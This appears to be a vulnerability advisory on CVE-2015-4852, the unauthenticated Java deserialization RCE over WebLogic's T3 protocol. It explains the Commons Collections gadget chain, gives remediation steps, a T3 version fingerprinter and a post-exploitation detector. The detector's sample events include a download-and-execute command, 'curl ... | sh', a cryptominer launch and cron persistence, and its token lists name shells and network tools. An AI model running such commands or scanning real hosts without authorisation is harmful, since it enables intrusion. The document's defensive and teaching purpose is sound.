CVE-2015-4852 — Oracle WebLogic Server Deserialization of Untrusted Data Vulnerability

CVE-2015-4852

Oracle WebLogic Server — Pre-Auth RCE via Apache Commons Collections Java Deserialization over T3 (Default Port 7001, Shared with the HTTP Listener); Part of the Broader 2015 Java Deserialization Epidemic

What Is Oracle WebLogic Server?

Oracle WebLogic Server is a Java EE application server widely deployed in enterprise and government environments to host Java web applications, web services, and enterprise business logic. WebLogic serves as the application runtime for many mission-critical enterprise systems — ERP backends, banking applications, government portals, and Oracle Fusion Middleware. As a core part of the Oracle Fusion Middleware stack, WebLogic is deeply embedded in enterprise Java architectures worldwide.

WebLogic uses the T3 protocol, a proprietary Oracle protocol for inter-JVM communication, cluster management, remote EJB/JMS invocation and WLST administration. T3 is served on the server's default listen port, 7001, which WebLogic multiplexes between HTTP, T3 and other protocols by inspecting the first bytes of each connection. T3 messages carry serialized Java objects, and the server deserializes them as part of parsing the request, before any credential is checked, which makes the listener a natural entry point for Java deserialization attacks.

Overview

Actively Exploited. This vulnerability has been added to CISA's Known Exploited Vulnerabilities (KEV) Catalog on November 3, 2021. Federal agencies are required to apply mitigations per BOD 22-01.

CVE-2015-4852 is a critical unauthenticated remote code execution vulnerability in Oracle WebLogic Server caused by unsafe Java deserialization of objects received over the T3 protocol on the default listen port (7001). The root cause is that WebLogic bundles Apache Commons Collections (oracle_common/modules/com.bea.core.apache.commons.collections.jar), a widely deployed Java library whose classes can be chained into "gadget chains" that turn deserialization of attacker-supplied bytes into arbitrary code execution. An unauthenticated attacker can send a malicious serialized Java object to WebLogic's T3 listener and achieve code execution as the WebLogic service account. Oracle published a Security Alert for CVE-2015-4852 in November 2015 with mitigation guidance and delivered fixes in the January 2016 Critical Patch Update.

Affected Versions

WebLogic Server Status
10.3.6.0 Vulnerable
12.1.2.0 Vulnerable
12.1.3.0 Vulnerable
12.2.1.0 Vulnerable

Oracle CPU January 2016 and subsequent patches address CVE-2015-4852. Any current WebLogic installation with cumulative patches applied is protected.

Technical Details

Root Cause: Java Deserialization via Apache Commons Collections

Java object deserialization converts a byte stream back into a Java object graph. When an application deserializes untrusted input with ObjectInputStream, the stream, not the application, decides which classes get instantiated: any Serializable class on the JVM classpath can be reconstructed, and its readObject, readResolve or hashCode/equals hooks run as a side effect, not just the type the application expected. Apache Commons Collections shipped functor classes (InvokerTransformer, ChainedTransformer, ConstantTransformer) and map wrappers (LazyMap, TransformedMap) that are Serializable and invoke arbitrary methods by reflection. Chained together and wrapped in a JDK class whose readObject touches the map (AnnotationInvocationHandler in the original chain), they form a "gadget chain": a sequence of object reconstructions and method invocations triggered purely by deserialization that ends in Runtime.exec() with an attacker-chosen command.

The attack path for CVE-2015-4852:

  1. Attacker constructs a malicious serialized Java object using an Apache Commons Collections gadget chain (for example ysoserial's CommonsCollections1 payload, which targets the commons-collections 3.x jar that WebLogic bundles)
  2. Attacker wraps the object in a T3 request and sends it to WebLogic's listen port (default: 7001); no credentials are required to open a T3 connection
  3. WebLogic parses the incoming T3 message and deserializes the embedded object before any authentication decision is made, which triggers the gadget chain
  4. Code execution occurs in the context of the WebLogic JVM process, typically a service account (often "oracle") with read/write access to the domain, the deployed applications and their credentials

The T3 protocol was designed for trusted cluster communication. Authentication happens at the application layer, after the request object has already been deserialized, so the vulnerable code path is reachable by anyone who can complete a TCP handshake with the port.
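Because the T3 listener answers before authenticating, a scanner can identify it and read its version banner with nothing more than the plaintext T3 handshake. The following script is an added example, not code from the page or from Oracle or FoxGlove Security; it sends the handshake, parses the HELO reply and maps the announced version onto the affected-version table above. It deliberately sends no serialized object, so it is safe against production systems. The hostnames, ports and sample banner are constructed for illustration.

```python
"""Fingerprint a WebLogic T3 listener for CVE-2015-4852 triage.

Added example. Sends only the T3 handshake (no Java objects), reads the
HELO banner, and reports whether the announced release is one the
advisory lists as affected. The sample banner at the bottom is constructed.
"""
import re
import socket

# Releases the advisory lists as affected by CVE-2015-4852.
AFFECTED_VERSIONS = {"10.3.6.0", "12.1.2.0", "12.1.3.0", "12.2.1.0"}

# First bytes a T3 client sends. AS = abbreviation table size, HL = header
# length, MS = max message size; these are the usual client values.
T3_HANDSHAKE = b"t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"

# A T3 listener answers "HELO:<version>.<secure-flag>", e.g. HELO:12.1.3.0.false
# An HTTP-only port or a filtered port does not answer with HELO.
_HELO_RE = re.compile(rb"^HELO:(\d+(?:\.\d+)+)\.(true|false)")


def parse_helo(response: bytes):
    """Return (version, tls_flag) from a T3 HELO banner, or None if not T3."""
    m = _HELO_RE.match(response)
    if not m:
        return None
    return m.group(1).decode(), m.group(2) == b"true"


def classify(version: str) -> str:
    """Map an announced version onto the affected-version table.

    Caveat: the banner identifies the release, not the patch level. A server
    with the January 2016 CPU applied still announces 12.1.3.0, so 'in scope'
    means 'verify the CPU level', not 'exploitable'.
    """
    if version in AFFECTED_VERSIONS:
        return "in scope for CVE-2015-4852: verify CPU patch level"
    return "version not in the CVE-2015-4852 affected list"


def fingerprint(host: str, port: int = 7001, timeout: float = 5.0) -> dict:
    """Connect, send the handshake, parse the banner. Network call; not run in tests."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(T3_HANDSHAKE)
        data = s.recv(1024)
    parsed = parse_helo(data)
    if parsed is None:
        return {"t3": False, "raw": data[:64]}
    version, tls = parsed
    return {"t3": True, "version": version, "tls": tls, "status": classify(version)}


# Constructed banner of the kind a 12.1.3.0 server returns, for offline use.
SAMPLE_BANNER = b"HELO:12.1.3.0.false\nAS:2048\nHL:19\n\n"

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 7001
        print(fingerprint(sys.argv[1], port))
    else:
        version, tls = parse_helo(SAMPLE_BANNER)
        print(version, "tls" if tls else "plaintext", classify(version))
```

Run it as `python t3_fingerprint.py wls01.example.internal 7001` to probe a host, or with no arguments to see the parser on the constructed banner. Treat a HELO reply from anything other than a cluster member or a management host as a finding in itself: it means the unauthenticated deserialization path is reachable from that network position regardless of patch level.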

Broader Deserialization Epidemic

The Apache Commons Collections gadget chain was first presented by Chris Frohoff and Gabriel Lawrence in January 2015 ("Marshalling Pickles", AppSecCali), and Frohoff released it as part of the ysoserial tool. It drew little attention until FoxGlove Security's November 2015 blog post demonstrated that the same chain gave unauthenticated code execution not just against WebLogic, but against IBM WebSphere (CVE-2015-7450), JBoss/WildFly, Jenkins (pre-fix) and OpenNMS: any Java application that had the library on its classpath and accepted serialized objects from the network.

Attack Characteristics

Attribute Detail
Attack Vector Network — T3 protocol on the default listen port (7001), which WebLogic shares with its HTTP listener
Authentication None required
Complexity Low — payload generators (ysoserial) widely available
Impact Full OS command execution as WebLogic service account
Tool ysoserial, Metasploit modules

Discovery

Stephen Breen of FoxGlove Security published "What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability." on November 6, 2015, demonstrating exploitation of the Apache Commons Collections gadget chains against multiple Java application servers including WebLogic. The underlying gadget chains had been disclosed by Chris Frohoff and Gabriel Lawrence in their January 2015 "Marshalling Pickles" talk and implemented in Frohoff's ysoserial.

Exploitation Context

  • Inaugural CISA KEV: CVE-2015-4852 was included in the first CISA KEV catalog published November 3, 2021, selected because of sustained exploitation nearly six years after disclosure, underscoring how long Java deserialization vulnerabilities remain exploitable in enterprise environments with poor patch hygiene
  • Cryptomining and ransomware: WebLogic deserialization vulnerabilities, CVE-2015-4852 and its successors (CVE-2017-10271, CVE-2019-2725), have been consistently exploited to deploy Monero cryptominers, and the later CVEs have also served as ransomware staging points; a WebLogic server running as a privileged service account provides a powerful beachhead for lateral movement
  • Persistent WebLogic attack class: Oracle has patched numerous subsequent WebLogic deserialization CVEs; attackers rotate between them as organizations patch specific CVEs but leave related vectors open, so organizations running WebLogic should treat the entire deserialization attack class as an ongoing threat
  • Enterprise Java exposure: the broader Apache Commons Collections deserialization problem affected essentially every Java EE application server in production in 2015, making it one of the most significant Java ecosystem security events

Remediation

CISA BOD 22-01 Deadline: May 3, 2022. Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
  1. Apply Oracle CPU patches — install the Oracle Critical Patch Update of January 2016 or any later CPU. Because CPUs are cumulative, a WebLogic installation at the current CPU level is protected against CVE-2015-4852 and the WebLogic deserialization CVEs fixed since. Confirm the patch level with OPatch rather than trusting the version banner, which does not change when a CPU is applied.

  2. Restrict T3 protocol access — firewall WebLogic's T3 port (default 7001) to allow access only from known cluster members and authorized management hosts. The T3 port should never be internet-accessible.

  3. Configure a WebLogic connection filter — this was Oracle's recommended workaround in its Security Alert for CVE-2015-4852. The built-in filter class weblogic.security.net.ConnectionFilterImpl takes rules that allow or deny connections by source address, local port and protocol, so you can deny t3 and t3s from every address except cluster members and management hosts while leaving HTTP open. Note that the connection filter restricts who may open a T3 connection; it does not inspect class names or block specific gadget classes, so it is a network-level compensating control, not a fix.

  4. Upgrade Apache Commons Collections — Apache Commons Collections 3.2.2 and 4.1+ disable deserialization of the unsafe functor classes (InvokerTransformer and friends) by default. This removes one gadget chain but not the root cause: other libraries on the classpath can provide new chains, and WebLogic ships its own copy of the library under oracle_common/modules, which should be updated through the Oracle CPU rather than swapped by hand.

  5. Apply JEP 290 serial filters — Java 9+ and the backports in 8u121, 7u131 and 6u141 support a JVM-wide deserialization filter (the jdk.serialFilter system property, or ObjectInputFilter in code) that rejects classes, packages, graph depth and array sizes before objects are instantiated. A pattern that denies org.apache.commons.collections.** blocks this chain; an allowlist of the classes the application genuinely deserializes is stronger and survives the discovery of new gadgets.

  6. Monitor for exploitation — detect post-exploitation indicators: unexpected child processes spawned by the WebLogic JVM, new scheduled tasks or cron jobs, cryptominer processes, or outbound connections from the WebLogic server to unusual destinations.
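The indicators in step 6 translate directly into detection logic. The following is an added example, not code from the page or from Oracle: it runs a few rules over process-creation events and flags a shell or download tool spawned by the WebLogic JVM (what a Commons Collections chain calling Runtime.exec() looks like from the host), cryptominer command lines and cron/scheduled-task persistence. The JSON-lines event shape (ts, host, user, pid, ppid, image, cmdline, parent_image, parent_cmdline) is a constructed simplification; map your EDR, auditd or Sysmon fields onto it. The sample events are invented.

```python
"""Detect post-exploitation behaviour of WebLogic deserialization attacks
in process-creation telemetry.

Added example. Event format is a constructed JSON-lines shape, one object
per line; the sample events below are invented for illustration.
"""
import json

# A WebLogic JVM should spawn almost nothing. A shell or download tool as
# its direct child is the signature of a gadget chain reaching Runtime.exec().
SUSPICIOUS_CHILDREN = {
    "sh", "bash", "dash", "ksh", "zsh", "cmd.exe", "powershell.exe",
    "curl", "wget", "nc", "ncat", "python", "perl", "crontab",
}

# Follow-on activity the advisory lists: persistence and cryptominers.
PERSISTENCE_TOKENS = ("crontab", "/etc/cron", "schtasks", "systemctl enable")
MINER_TOKENS = ("xmrig", "stratum+tcp://", "minerd", "--donate-level", "cryptonight")


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1]


def is_weblogic_jvm(image: str, cmdline: str) -> bool:
    """True for a java process whose command line runs weblogic.Server."""
    return _basename(image) in ("java", "java.exe") and "weblogic.Server" in cmdline


def analyze_event(ev: dict) -> list:
    """Return [(rule, detail), ...] findings for one process-creation event."""
    findings = []
    child = _basename(ev["image"])
    cmd = ev.get("cmdline", "")
    parent_is_wls = is_weblogic_jvm(ev.get("parent_image", ""),
                                    ev.get("parent_cmdline", ""))
    if parent_is_wls and child in SUSPICIOUS_CHILDREN:
        findings.append(("weblogic_spawned_shell",
                         f"{child} as child of WebLogic JVM pid {ev['ppid']}"))
    lowered = cmd.lower()
    if any(tok in lowered for tok in MINER_TOKENS):
        findings.append(("cryptominer_cmdline", cmd))
    if any(tok in lowered for tok in PERSISTENCE_TOKENS):
        findings.append(("persistence_mechanism", cmd))
    return findings


def analyze_stream(lines) -> list:
    """Run analyze_event over JSON lines; returns [(pid, rule, detail), ...]."""
    results = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        for rule, detail in analyze_event(ev):
            results.append((ev["pid"], rule, detail))
    return results


# Constructed sample: the JVM (pid 4120) is compromised, spawns sh, which
# downloads a stager, starts a miner and installs a cron job. The last event
# is a legitimate admin tool launched by the JVM and should not fire.
SAMPLE_EVENTS = """
{"ts":"2021-11-03T10:00:01Z","host":"wls01","user":"oracle","pid":4120,"ppid":1,"image":"/usr/java/bin/java","cmdline":"java -Dweblogic.Name=AdminServer weblogic.Server","parent_image":"/usr/sbin/init","parent_cmdline":"init"}
{"ts":"2021-11-03T10:05:12Z","host":"wls01","user":"oracle","pid":4311,"ppid":4120,"image":"/bin/sh","cmdline":"sh -c curl -s http://203.0.113.7/x.sh | sh","parent_image":"/usr/java/bin/java","parent_cmdline":"java -Dweblogic.Name=AdminServer weblogic.Server"}
{"ts":"2021-11-03T10:05:13Z","host":"wls01","user":"oracle","pid":4312,"ppid":4311,"image":"/usr/bin/curl","cmdline":"curl -s http://203.0.113.7/x.sh","parent_image":"/bin/sh","parent_cmdline":"sh -c curl -s http://203.0.113.7/x.sh | sh"}
{"ts":"2021-11-03T10:05:20Z","host":"wls01","user":"oracle","pid":4330,"ppid":4311,"image":"/tmp/.x/xmrig","cmdline":"/tmp/.x/xmrig -o stratum+tcp://pool.example:3333 --donate-level=1","parent_image":"/bin/sh","parent_cmdline":"sh -c curl -s http://203.0.113.7/x.sh | sh"}
{"ts":"2021-11-03T10:05:21Z","host":"wls01","user":"oracle","pid":4331,"ppid":4311,"image":"/usr/bin/crontab","cmdline":"crontab /tmp/.x/cron","parent_image":"/bin/sh","parent_cmdline":"sh -c curl -s http://203.0.113.7/x.sh | sh"}
{"ts":"2021-11-03T10:06:00Z","host":"wls01","user":"oracle","pid":4400,"ppid":4120,"image":"/usr/java/bin/java","cmdline":"java -cp wlfullclient.jar weblogic.Admin","parent_image":"/usr/java/bin/java","parent_cmdline":"java -Dweblogic.Name=AdminServer weblogic.Server"}
"""

if __name__ == "__main__":
    for pid, rule, detail in analyze_stream(SAMPLE_EVENTS.splitlines()):
        print(f"pid={pid} {rule}: {detail}")
```

The first rule is the high-value one: it is nearly free of false positives on a WebLogic host, because the JVM has no legitimate reason to launch a shell, and it fires on the first stage of the attack rather than on the miner that arrives later. The token lists are illustrative starting points and should be extended from your own telemetry.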

Key Details

Property Value
CVE ID CVE-2015-4852
Vendor / Product Oracle — WebLogic Server
NVD Published 2015-11-18
NVD Last Modified 2025-10-22
CVSS 3.1 Score 9.8
CVSS 3.1 Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity CRITICAL
CWE CWE-502 — Deserialization of Untrusted Data
CISA KEV Added 2021-11-03
CISA KEV Deadline 2022-05-03
Known Ransomware Use No

CVSS 3.1 Breakdown

Metric Value
Attack Vector Network
Attack Complexity Low
Privileges Required None
User Interaction None
Scope Unchanged
Confidentiality High
Integrity High
Availability High

Required Action

CISA BOD 22-01 Deadline: 2022-05-03. Apply updates per vendor instructions.

Timeline

Date Event
2015-01 Chris Frohoff and Gabriel Lawrence present the Apache Commons Collections gadget chain ("Marshalling Pickles", AppSecCali); ysoserial released
2015-11-06 FoxGlove Security publishes research showing the gadget chain gives unauthenticated RCE against WebLogic, WebSphere, JBoss, Jenkins and OpenNMS
2015-11-10 Oracle publishes Security Alert Advisory for CVE-2015-4852 with mitigation guidance (connection filters restricting T3)
2015-11-18 CVE-2015-4852 published by NVD
2016-01-19 Oracle Critical Patch Update January 2016 released; CVE-2015-4852 addressed for Oracle WebLogic Server
2021-11-03 Added to CISA Known Exploited Vulnerabilities catalog (inaugural KEV catalog launch)
2022-05-03 CISA BOD 22-01 remediation deadline